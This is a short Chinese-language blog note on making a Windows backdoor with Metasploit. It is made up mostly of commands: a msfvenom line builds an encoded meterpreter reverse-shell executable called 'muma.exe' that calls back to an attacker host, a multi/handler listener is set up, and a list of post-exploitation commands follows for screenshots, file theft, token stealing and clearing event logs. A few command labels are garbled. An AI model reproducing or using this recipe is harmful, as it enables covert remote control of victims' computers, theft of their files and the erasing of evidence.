kali的学习笔记篇(七)metasploit之PC后门

更新时间:2018年8月13日07:06:14

//生成后门
//参数可参照第五篇文章:PC渗透参数集
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.1.113 LPORT=55555 -f exe > /root/muma.exe 

//选择模块
use exploit/multi/handler
//装载攻击载荷,添加TCP反向链接
set PAYLOAD windows/meterpreter/reverse_tcp
//本机IP
set LHOST [myIP]
//本机端口
set LPORT [myPORT]
//执行监听

//help查看哪些模块可以用
//列出系统信息
sysinfo
//获取目标当前的全屏截图
screenshot
//在目标机子上播放音频
play [音频文件路径]
//搜索文件
search -f *.jpg
//下载文件 -r 参数为递归下载,路径反斜杠要全部换成正斜杠
download -r C://Windows/Web/Wallpaper/Architecture
//获取磁盘列表
show_mount
//获取用户名
getuid
//获取sid
getsid
//列出目标进程
ps
//按名称终止进程
pkill 
//终止进程
kali 
//暂停/恢复进程 :-c暂停,-r恢复
suspend -c [PID]
//进程注入
steal_token
//启用一些用户组件
uictl enable [组件名/设备名]
//清除事件日志
clearev

exploit

你可能感兴趣的:(kali,卡莉咖喱)